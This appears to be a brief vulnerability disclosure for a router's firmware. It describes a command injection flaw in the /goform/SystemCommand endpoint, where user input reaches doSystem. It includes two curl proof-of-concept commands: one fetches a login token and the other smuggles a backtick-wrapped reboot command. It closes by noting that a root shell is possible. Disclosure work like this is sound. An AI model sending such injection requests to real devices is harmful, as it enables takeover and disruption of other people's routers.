







The picture above shows the latest firmware for this version

Vulnerability details

Vulnerability occurs in /goform/SystemCommand

After the user passes in the command parameter, it will be spliced into byte_4836B0 by snprintf, and finally doSystem(&byte_4836B0); will be executed, resulting in a command injection vulnerability

Poc

The first thing you need to do is to get the tokenid

```
curl http://192.168.0.1/dir_login.asp | grep tokenid
```

Then run the following poc

```
curl -i -X POST http://192.168.0.1/goform/SystemCommand -d tokenid=xxxx -d
'command=`reboot`'
```

Then we can see that the router restarts, and finally we can write an exp to get a root shell